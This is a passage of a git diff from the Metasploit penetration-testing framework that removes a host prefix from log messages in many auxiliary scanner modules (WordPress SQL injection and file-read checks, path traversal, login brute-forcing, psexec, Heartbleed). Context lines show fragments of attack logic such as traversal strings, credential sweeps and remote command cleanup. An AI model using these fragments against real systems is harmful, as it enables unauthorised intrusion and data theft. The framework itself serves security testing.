\"#{user}:#{pass}\"") do_login(user, pass) } end diff --git a/modules/auxiliary/scanner/http/wildfly_traversal.rb b/modules/auxiliary/scanner/http/wildfly_traversal.rb index cf05c0858a..6486a74948 100644 --- a/modules/auxiliary/scanner/http/wildfly_traversal.rb +++ b/modules/auxiliary/scanner/http/wildfly_traversal.rb @@ -40,7 +40,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Attempting to download: #{datastore['RELATIVE_FILE_PATH']}") + vprint_status("Attempting to download: #{datastore['RELATIVE_FILE_PATH']}") traversal = "..\\" * datastore['TRAVERSAL_DEPTH'] res = send_request_raw({ @@ -62,9 +62,9 @@ class Metasploit3 < Msf::Auxiliary res.body, fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded") + vprint_error("Nothing was downloaded") end end end diff --git a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb index 12e6ed9e4a..a9ae93a81b 100644 --- a/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb +++ b/modules/auxiliary/scanner/http/wordpress_cp_calendar_sqli.rb @@ -42,7 +42,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, '/'), @@ -55,14 +55,14 @@ class Metasploit4 < Msf::Auxiliary }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress") + print_good("Vulnerable to unauthenticated SQL injection within CP Multi-View Calendar 1.1.4 for Wordpress") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb index 1584fd9278..9b804e4bb4 100644 --- a/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb +++ b/modules/auxiliary/scanner/http/wordpress_ghost_scanner.rb @@ -49,12 +49,12 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) unless wordpress_and_online? - print_error("#{peer} - Looks like this site is no WordPress blog") + print_error("Looks like this site is no WordPress blog") return end unless wordpress_xmlrpc_enabled? - print_error("#{peer} - XMLRPC interface is not enabled") + print_error("XMLRPC interface is not enabled") return end @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Auxiliary ) if res.nil? || res.code == 500 - print_good("#{peer} - vulnerable to GHOST") + print_good("vulnerable to GHOST") report_vuln( :host => ip, :proto => 'tcp', @@ -80,7 +80,7 @@ class Metasploit3 < Msf::Auxiliary :sname => datastore['SSL'] ? "https" : "http" ) else - print_status("#{peer} - target not vulnerable to GHOST") + print_status("target not vulnerable to GHOST") end end diff --git a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb index fb7097671a..b46c204c6f 100644 --- a/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb +++ b/modules/auxiliary/scanner/http/wordpress_xmlrpc_login.rb @@ -51,7 +51,7 @@ class Metasploit3 < Msf::Auxiliary return :abort end - print_status("#{peer} - Starting XML-RPC login sweep...") + print_status("Starting XML-RPC login sweep...") cred_collection = Metasploit::Framework::CredentialCollection.new( blank_passwords: datastore['BLANK_PASSWORDS'], diff --git a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb index 36448f4262..3892db3191 100644 --- a/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb +++ b/modules/auxiliary/scanner/http/wp_contus_video_gallery_sqli.rb @@ -38,7 +38,7 @@ class Metasploit4 < Msf::Auxiliary left_marker = Rex::Text.rand_text_alpha(5) flag = Rex::Text.rand_text_alpha(5) - vprint_status("#{peer} - Checking host") + vprint_status("Checking host") res = send_request_cgi({ 'uri' => wordpress_url_admin_ajax, @@ -49,14 +49,14 @@ class Metasploit4 < Msf::Auxiliary } }) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way") + vprint_error("Server did not respond in an expected way") return end result = res.body =~ /#{left_marker}#{flag}#{right_marker}/ if result - print_good("#{peer} - Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress") + print_good("Vulnerable to unauthenticated SQL injection within Contus Video Gallery 2.7 for Wordpress") report_vuln({ :host => rhost, :port => rport, diff --git a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb index 507b311f36..11c29161d2 100644 --- a/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb @@ -74,9 +74,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") + print_error("Nothing was downloaded. You can try to change the DEPTH parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb index 58f70a893b..d4384810b1 100644 --- a/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_gimedia_library_file_read.rb @@ -69,9 +69,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded. Check the path and the traversal parameters.") + vprint_error("Nothing was downloaded. Check the path and the traversal parameters.") end end end diff --git a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb index 6c8259c09f..1f9046447c 100644 --- a/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb +++ b/modules/auxiliary/scanner/http/wp_mobile_pack_info_disclosure.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Auxiliary ) temp = JSON.parse(res.body.gsub(/exportarticle\(/, "").gsub(/\)/, "")) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, JSON::ParserError => e - print_error("#{peer} - The following Error was encountered: #{e.class}") + print_error("The following Error was encountered: #{e.class}") return end @@ -77,9 +77,9 @@ class Metasploit3 < Msf::Auxiliary ip, res_clean ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try checking the POSTID parameter.") + print_error("Nothing was downloaded. You can try checking the POSTID parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb index ca60253e0c..88f9ca2081 100644 --- a/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb @@ -72,9 +72,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.") + print_error("Nothing was downloaded. You can try to change the DEPTH parameter.") end end end diff --git a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb index accb58a7f7..51404cbbd1 100644 --- a/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -93,20 +93,20 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Trying to login as: #{user}") + vprint_status("Trying to login as: #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as: #{user}") + print_error("Unable to login as: #{user}") return end - vprint_status("#{peer} - Trying to get nonce...") + vprint_status("Trying to get nonce...") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - vprint_status("#{peer} - Got nonce: #{nonce}") + vprint_status("Got nonce: #{nonce}") traversal = "../" * datastore['DEPTH'] filename = datastore['DIRPATH'] @@ -144,9 +144,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the DIRPATH.") + print_error("Nothing was downloaded. You can try to change the DIRPATH.") end end end diff --git a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb index 4c8334e289..7f0559721d 100644 --- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary ) unless res && res.body - vprint_error("#{peer} - Server did not respond in an expected way.") + vprint_error("Server did not respond in an expected way.") return end @@ -81,9 +81,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - vprint_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.") + vprint_error("Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.") end end end diff --git a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb index 78e9e72086..001e7a8f7a 100644 --- a/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb +++ b/modules/auxiliary/scanner/http/wp_subscribe_comments_file_read.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -116,25 +116,25 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Trying to login as: #{user}") + vprint_status("Trying to login as: #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as: #{user}") + print_error("Unable to login as: #{user}") return end - vprint_status("#{peer} - Trying to get nonce...") + vprint_status("Trying to get nonce...") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - vprint_status("#{peer} - Got nonce: #{nonce}") + vprint_status("Got nonce: #{nonce}") - vprint_status("#{peer} - Trying to download filepath.") + vprint_status("Trying to download filepath.") file_path = down_file(cookie, nonce) if file_path.nil? - print_error("#{peer} - Error downloading filepath.") + print_error("Error downloading filepath.") return end @@ -164,9 +164,9 @@ class Metasploit3 < Msf::Auxiliary fname ) - print_good("#{peer} - File saved in: #{path}") + print_good("File saved in: #{path}") else - print_error("#{peer} - Nothing was downloaded. You can try to change the FILEPATH.") + print_error("Nothing was downloaded. You can try to change the FILEPATH.") end end end diff --git a/modules/auxiliary/scanner/misc/java_rmi_server.rb b/modules/auxiliary/scanner/misc/java_rmi_server.rb index ead12ac27a..f62eb75a58 100644 --- a/modules/auxiliary/scanner/misc/java_rmi_server.rb +++ b/modules/auxiliary/scanner/misc/java_rmi_server.rb @@ -35,19 +35,19 @@ class Metasploit3 < Msf::Auxiliary end def run_host(target_host) - vprint_status("#{peer} - Sending RMI Header...") + vprint_status("Sending RMI Header...") connect send_header ack = recv_protocol_ack if ack.nil? - print_error("#{peer} - Failed to negotiate RMI protocol") + print_error("Failed to negotiate RMI protocol") disconnect return end # Determine if the instance allows remote class loading - vprint_status("#{peer} - Sending RMI Call...") + vprint_status("Sending RMI Call...") jar = Rex::Text.rand_text_alpha(rand(8)+1) + '.jar' jar_url = "file:RMIClassLoaderSecurityTest/" + jar @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary return_value = recv_return if return_value.nil? - print_error("#{peer} - Failed to send RMI Call, anyway JAVA RMI Endpoint detected") + print_error("Failed to send RMI Call, anyway JAVA RMI Endpoint detected") report_service(:host => rhost, :port => rport, :name => "java-rmi", :info => "") return end diff --git a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb index 8c7fa985c9..04900cde94 100644 --- a/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb +++ b/modules/auxiliary/scanner/misc/sunrpc_portmapper.rb @@ -28,7 +28,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) peer = "#{ip}:#{rport}" - vprint_status "#{peer} - SunRPC - Enumerating programs" + vprint_status "SunRPC - Enumerating programs" begin program = 100000 @@ -48,7 +48,7 @@ class Metasploit3 < Msf::Auxiliary end sunrpc_destroy return if maps.empty? - vprint_good("#{peer} - Found #{maps.size} programs available") + vprint_good("Found #{maps.size} programs available") table = Rex::Ui::Text::Table.new( 'Header' => "SunRPC Programs for #{ip}", diff --git a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb index 7219f8eab1..f5b6bdbe5c 100644 --- a/modules/auxiliary/scanner/mysql/mysql_file_enum.rb +++ b/modules/auxiliary/scanner/mysql/mysql_file_enum.rb @@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary end def run_host(ip) - vprint_status("#{peer} - Login...") + vprint_status("Login...") if (not mysql_login_datastore) return @@ -53,10 +53,10 @@ class Metasploit3 < Msf::Auxiliary begin mysql_query_no_handle("USE " + datastore['DATABASE_NAME']) rescue ::RbMysql::Error => e - vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") + vprint_error("MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - vprint_error("#{peer} - Timeout: #{e.message}") + vprint_error("Timeout: #{e.message}") return end @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Auxiliary table_exists = (res.size == 1) if !table_exists - vprint_status("#{peer} - Table doesn't exist so creating it") + vprint_status("Table doesn't exist so creating it") mysql_query("CREATE TABLE " + datastore['TABLE_NAME'] + " (brute int);") end @@ -75,7 +75,7 @@ class Metasploit3 < Msf::Auxiliary file.close if !table_exists - vprint_status("#{peer} - Cleaning up the temp table") + vprint_status("Cleaning up the temp table") mysql_query("DROP TABLE " + datastore['TABLE_NAME']) end end @@ -84,7 +84,7 @@ class Metasploit3 < Msf::Auxiliary begin res = mysql_query_no_handle("LOAD DATA INFILE '" + dir + "' INTO TABLE " + datastore['TABLE_NAME']) rescue ::RbMysql::TextfileNotReadable - print_good("#{peer} - #{dir} is a directory and exists") + print_good("#{dir} is a directory and exists") report_note( :host => rhost, :type => "filesystem.dir", @@ -94,7 +94,7 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) rescue ::RbMysql::DataTooLong, ::RbMysql::TruncatedWrongValueForField - print_good("#{peer} - #{dir} is a file and exists") + print_good("#{dir} is a file and exists") report_note( :host => rhost, :type => "filesystem.file", @@ -104,15 +104,15 @@ class Metasploit3 < Msf::Auxiliary :update => :unique_data ) rescue ::RbMysql::ServerError - vprint_warning("#{peer} - #{dir} does not exist") + vprint_warning("#{dir} does not exist") rescue ::RbMysql::Error => e - vprint_error("#{peer} - MySQL Error: #{e.class} #{e.to_s}") + vprint_error("MySQL Error: #{e.class} #{e.to_s}") return rescue Rex::ConnectionTimeout => e - vprint_error("#{peer} - Timeout: #{e.message}") + vprint_error("Timeout: #{e.message}") return else - print_good("#{peer} - #{dir} is a file and exists") + print_good("#{dir} is a file and exists") report_note( :host => rhost, :type => "filesystem.file", diff --git a/modules/auxiliary/scanner/redis/redis_server.rb b/modules/auxiliary/scanner/redis/redis_server.rb index 2d85876963..6d91606685 100644 --- a/modules/auxiliary/scanner/redis/redis_server.rb +++ b/modules/auxiliary/scanner/redis/redis_server.rb @@ -33,15 +33,15 @@ class Metasploit3 < Msf::Auxiliary end def run_host(_ip) - vprint_status("#{peer} -- contacting redis") + vprint_status("Contacting redis") begin connect return unless (data = redis_command(command)) report_service(host: rhost, port: rport, name: "redis server", info: "#{command} response: #{data}") - print_good("#{peer} -- found redis with #{command} command: #{Rex::Text.to_hex_ascii(data)}") + print_good("Found redis with #{command} command: #{Rex::Text.to_hex_ascii(data)}") rescue Rex::AddressInUse, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError, ::Errno::ETIMEDOUT => e - vprint_error("#{peer} -- error while communicating: #{e}") + vprint_error("Error while communicating: #{e}") ensure disconnect end diff --git a/modules/auxiliary/scanner/rsync/modules_list.rb b/modules/auxiliary/scanner/rsync/modules_list.rb index 37584933e1..547e102a79 100644 --- a/modules/auxiliary/scanner/rsync/modules_list.rb +++ b/modules/auxiliary/scanner/rsync/modules_list.rb @@ -70,11 +70,11 @@ class Metasploit3 < Msf::Auxiliary elsif res =~ /^#{RSYNC_HEADER} OK$/ 'not required' else - vprint_error("#{peer} - unexpected response when connecting to #{rmodule}: #{res}") + vprint_error("unexpected response when connecting to #{rmodule}: #{res}") "unexpected response '#{res}'" end else - vprint_error("#{peer} - no response when connecting to #{rmodule}") + vprint_error("no response when connecting to #{rmodule}") 'no response' end end @@ -116,7 +116,7 @@ class Metasploit3 < Msf::Auxiliary end unless version - vprint_error("#{peer} - no rsync negotiation found") + vprint_error("no rsync negotiation found") return end @@ -149,12 +149,12 @@ class Metasploit3 < Msf::Auxiliary connect version, motd = rsync_negotiate unless version - vprint_error("#{peer} - does not appear to be rsync") + vprint_error("does not appear to be rsync") disconnect return end rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} - error while connecting and negotiating: #{e}") + vprint_error("error while connecting and negotiating: #{e}") disconnect return end @@ -168,8 +168,8 @@ class Metasploit3 < Msf::Auxiliary name: 'rsync', info: info ) - print_status("#{peer} - rsync version: #{version}") if datastore['SHOW_VERSION'] - print_status("#{peer} - rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD'] + print_status("rsync version: #{version}") if datastore['SHOW_VERSION'] + print_status("rsync MOTD: #{motd}") if motd && datastore['SHOW_MOTD'] modules_metadata = {} begin @@ -182,10 +182,10 @@ class Metasploit3 < Msf::Auxiliary end if modules_metadata.empty? - print_status("#{peer} - no rsync modules found") + print_status("no rsync modules found") else modules = modules_metadata.map { |m| m[:name] } - print_good("#{peer} - #{modules.size} rsync modules found: #{modules.join(', ')}") + print_good("#{modules.size} rsync modules found: #{modules.join(', ')}") table_columns = %w(Name Comment) if datastore['TEST_AUTHENTICATION'] @@ -196,7 +196,7 @@ class Metasploit3 < Msf::Auxiliary rsync_negotiate module_metadata[:authentication] = get_rsync_auth_status(module_metadata[:name]) rescue *HANDLED_EXCEPTIONS => e - vprint_error("#{peer} - error while testing authentication on #{module_metadata[:name]}: #{e}") + vprint_error("error while testing authentication on #{module_metadata[:name]}: #{e}") break ensure disconnect diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index b7543c4122..57af398132 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -95,7 +95,7 @@ class Metasploit4 < Msf::Auxiliary pass = pass.gsub("<SAPSID>", datastore["SAP_SID"]) end - print_status("#{peer} - Trying username:'#{user}' password:'#{pass}'") + print_status("Trying username:'#{user}' password:'#{pass}'") success = false soapenv = 'http://schemas.xmlsoap.org/soap/envelope/' diff --git a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb index 5929b84dbf..6717969a73 100644 --- a/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb +++ b/modules/auxiliary/scanner/smb/psexec_loggedin_users.rb @@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary connect smb_login rescue StandardError => autherror - print_error("#{peer} - #{autherror}") + print_error("#{autherror}") return end @@ -88,7 +88,7 @@ class Metasploit3 < Msf::Auxiliary output.each_line { |line| cleanout << line.chomp if line.include?("HKEY") && line.split("-").size == 8 && !line.split("-")[7].include?("_")} return cleanout rescue StandardError => hku_error - print_error("#{peer} - Error runing query against HKU. #{hku_error.class}. #{hku_error}") + print_error("Error runing query against HKU. #{hku_error.class}. #{hku_error}") return nil end end @@ -103,7 +103,7 @@ class Metasploit3 < Msf::Auxiliary simple.disconnect("\\\\#{ip}\\#{smbshare}") return output rescue StandardError => output_error - print_error("#{peer} - Error getting command output. #{output_error.class}. #{output_error}.") + print_error("Error getting command output. #{output_error.class}. #{output_error}.") return false end end @@ -136,7 +136,7 @@ class Metasploit3 < Msf::Auxiliary domain = line if line.include?("USERDOMAIN") end if domain.split(" ")[2].to_s.chomp + "\\" + username.split(" ")[2].to_s.chomp == datastore['USERNAME'] - print_good("#{peer} - #{datastore['USERNAME']} is logged in") + print_good("#{datastore['USERNAME']} is logged in") report_user(datastore['USERNAME']) end return @@ -150,7 +150,7 @@ class Metasploit3 < Msf::Auxiliary end if username.length > 0 && domain.length > 0 user = domain.split(" ")[2].to_s + "\\" + username.split(" ")[2].to_s - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) elsif logonserver.length > 0 && homepath.length > 0 uname = homepath.split('\\')[homepath.split('\\').size - 1] @@ -158,24 +158,24 @@ class Metasploit3 < Msf::Auxiliary uname = uname.split(".")[0] end user = logonserver.split('\\\\')[1].chomp.to_s + "\\" + uname.to_s - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) else username = query_session(smbshare, ip, cmd, text, bat) if username hostname = (dnsdomain.split(" ")[2] || "").split(".")[0] || "." user = "#{hostname}\\#{username}" - print_good("#{peer} - #{user}") + print_good("#{user}") report_user(user.chomp) else - print_status("#{peer} - Unable to determine user information for user: #{key}") + print_status("Unable to determine user information for user: #{key}") end end else - print_status("#{peer} - Could not determine logged in users") + print_status("Could not determine logged in users") end rescue Rex::Proto::SMB::Exceptions::Error => check_error - print_error("#{peer} - Error checking reg key. #{check_error.class}. #{check_error}") + print_error("Error checking reg key. #{check_error.class}. #{check_error}") return check_error end end @@ -185,12 +185,12 @@ class Metasploit3 < Msf::Auxiliary begin # Try and do cleanup command cleanup = "#{cmd} /C del %SYSTEMDRIVE%#{text} & del #{bat}" - print_status("#{peer} - Executing cleanup") + print_status("Executing cleanup") out = psexec(cleanup) rescue StandardError => cleanuperror - print_error("#{peer} - Unable to processes cleanup commands: #{cleanuperror}") - print_warning("#{peer} - Maybe %SYSTEMDRIVE%#{text} must be deleted manually") - print_warning("#{peer} - Maybe #{bat} must be deleted manually") + print_error("Unable to processes cleanup commands: #{cleanuperror}") + print_warning("Maybe %SYSTEMDRIVE%#{text} must be deleted manually") + print_warning("Maybe #{bat} must be deleted manually") return cleanuperror end end diff --git a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb index abed2f4c4f..8a0c584137 100644 --- a/modules/auxiliary/scanner/smb/smb_uninit_cred.rb +++ b/modules/auxiliary/scanner/smb/smb_uninit_cred.rb @@ -255,13 +255,13 @@ class Metasploit3 < Msf::Auxiliary peer = "#{ip}:#{rport}" case check_host(ip) when Exploit::CheckCode::Vulnerable - print_good("#{peer} - The target is vulnerable to CVE-2015-0240.") + print_good("The target is vulnerable to CVE-2015-0240.") when Exploit::CheckCode::Appears - print_good("#{peer} - The target appears to be vulnerable to CVE-2015-0240.") + print_good("The target appears to be vulnerable to CVE-2015-0240.") when Exploit::CheckCode::Detected - print_status("#{peer} - The target appears to be running Samba.") + print_status("The target appears to be running Samba.") else - print_status("#{peer} - The target appears to be safe") + print_status("The target appears to be safe") end end diff --git a/modules/auxiliary/scanner/smtp/smtp_relay.rb b/modules/auxiliary/scanner/smtp/smtp_relay.rb index 1c5be24aad..cac03b0b94 100644 --- a/modules/auxiliary/scanner/smtp/smtp_relay.rb +++ b/modules/auxiliary/scanner/smtp/smtp_relay.rb @@ -42,7 +42,7 @@ class Metasploit3 < Msf::Auxiliary begin connect banner_sanitized = Rex::Text.to_hex_ascii(banner.to_s) - print_status("#{peer} - SMTP #{banner_sanitized}") + print_status("SMTP #{banner_sanitized}") report_service(:host => rhost, :port => rport, :name => "smtp", :info => banner) if datastore['EXTENDED'] @@ -76,7 +76,7 @@ class Metasploit3 < Msf::Auxiliary do_test_relay(nil, "MAIL FROM:<#{datastore['MAILFROM']}>", "RCPT TO:<#{datastore['MAILTO']}>") end rescue - print_error("#{peer} - Unable to establish an SMTP session") + print_error("Unable to establish an SMTP session") return end end @@ -86,36 +86,36 @@ class Metasploit3 < Msf::Auxiliary connect res = raw_send_recv("EHLO X\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{mailfrom}\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{mailto}\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("DATA\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") res = raw_send_recv("#{Rex::Text.rand_text_alpha(rand(10)+5)}\r\n.\r\n") - vprint_status("#{peer} - #{res.inspect}") + vprint_status("#{res.inspect}") if res =~ /250/ if testnumber.nil? - print_good("#{peer} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") + print_good("Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") else - print_good("#{peer} - Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") + print_good("Test ##{testnumber} - Potential open SMTP relay detected: - #{mailfrom} -> #{mailto}") end else if testnumber.nil? - print_status "#{peer} - No relay detected" + print_status "No relay detected" else - print_status "#{peer} - Test ##{testnumber} - No relay detected" + print_status "Test ##{testnumber} - No relay detected" end end rescue - print_error("#{peer} - Test ##{testnumber} - Unable to establish an SMTP session") + print_error("Test ##{testnumber} - Unable to establish an SMTP session") return end end diff --git a/modules/auxiliary/scanner/ssl/openssl_ccs.rb b/modules/auxiliary/scanner/ssl/openssl_ccs.rb index 69f1e4cfa4..7b727ef94c 100644 --- a/modules/auxiliary/scanner/ssl/openssl_ccs.rb +++ b/modules/auxiliary/scanner/ssl/openssl_ccs.rb @@ -123,16 +123,16 @@ class Metasploit3 < Msf::Auxiliary connect_result = establish_connect return if connect_result.nil? - vprint_status("#{peer} - Sending CCS...") + vprint_status("Sending CCS...") sock.put(ccs) alert = sock.get_once(-1, response_timeout) if alert.blank? - print_good("#{peer} - No alert after invalid CCS message, probably vulnerable") + print_good("No alert after invalid CCS message, probably vulnerable") report elsif alert.unpack("C").first == ALERT_RECORD_TYPE - vprint_error("#{peer} - Alert record as response to the invalid CCS Message, probably not vulnerable") + vprint_error("Alert record as response to the invalid CCS Message, probably not vulnerable") elsif alert - vprint_warning("#{peer} - Unexpected response.") + vprint_warning("Unexpected response.") end end @@ -181,18 +181,18 @@ class Metasploit3 < Msf::Auxiliary def establish_connect connect - vprint_status("#{peer} - Sending Client Hello...") + vprint_status("Sending Client Hello...") sock.put(client_hello) server_hello = sock.get_once(-1, response_timeout) unless server_hello - vprint_error("#{peer} - No Server Hello after #{response_timeout} seconds...") + vprint_error("No Server Hello after #{response_timeout} seconds...") disconnect return nil end unless server_hello.unpack("C").first == HANDSHAKE_RECORD_TYPE - vprint_error("#{peer} - Server Hello Not Found") + vprint_error("Server Hello Not Found") return nil end diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index 6d1a466b31..409c8722ad 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -177,7 +177,7 @@ class Metasploit3 < Msf::Auxiliary # Called when using check def check_host(ip) @check_only = true - vprint_status "#{peer} - Checking for Heartbleed exposure" + vprint_status "Checking for Heartbleed exposure" if bleed Exploit::CheckCode::Appears else @@ -339,13 +339,13 @@ class Metasploit3 < Msf::Auxiliary if jabber_host && jabber_host[1] disconnect establish_connect - vprint_status("#{peer} - Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") + vprint_status("Connecting with autodetected remote XMPP hostname: #{jabber_host[1]}...") sock.put(jabber_connect_msg(jabber_host[1])) res = get_data end end if res.nil? || res.include?('stream:error') || res !~ /<starttls xmlns=['"]urn:ietf:params:xml:ns:xmpp-tls['"]/ - vprint_error("#{peer} - Jabber host unknown. Please try changing the XMPPDOMAIN option.") if res && res.include?('host-unknown') + vprint_error("Jabber host unknown. Please try changing the XMPPDOMAIN option.") if res && res.include?('host-unknown') return nil end msg = "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>" @@ -364,7 +364,7 @@ class Metasploit3 < Msf::Auxiliary return nil if res.nil? if res !~ /^234/ # res contains the error message - vprint_error("#{peer} - FTP error: #{res.strip}") + vprint_error("FTP error: #{res.strip}") return nil end res @@ -408,21 +408,21 @@ class Metasploit3 < Msf::Auxiliary connect unless tls_callback == 'None' - vprint_status("#{peer} - Trying to start SSL via 